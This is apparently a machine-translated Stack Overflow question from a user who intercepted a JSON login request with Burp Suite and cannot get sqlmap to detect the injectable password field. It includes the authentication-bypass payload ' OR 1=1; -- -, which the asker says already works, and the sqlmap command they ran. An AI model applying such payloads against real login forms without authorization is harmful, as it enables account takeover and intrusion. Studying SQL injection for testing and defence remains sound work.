嗨我正在嘗試在登錄表單中執行SQL注入。SQLMAP - 將JSON數據發佈爲正文
隨着BurpSuite我攔截該請求:
POST /xxxx/web/Login HTTP/1.1
Host: 10.0.0.70:42020
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/plain, */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://xxxxxx.com/xxxxxx/
Content-Length: 44
origin: http://xxxxx.com
Connection: close
{"username」:"user",」password」:"pass"}
使用:
sqlmap -u requestFile
(其中requestFile與打嗝所截獲的請求的內容)
的SqlMap找不到可注射的字段即密碼。
我敢肯定,這就是它的可注射的原因,如果因爲密碼我輸入:
' OR 1=1; -- -
我可以與每一個用戶名登錄我插入
也試圖與:
{"username」:*,」password」:*}
但沒有運氣。
我在做什麼錯了?
這個問題可能會更適合http://security.stackexchange.com/但它是怎樣的一箇中景我沒有投票關閉的這裏。儘管如此,你可能會得到更多的答案。 –
還發布在[security.stackexchange.com](http://security.stackexchange.com/) – ronIDX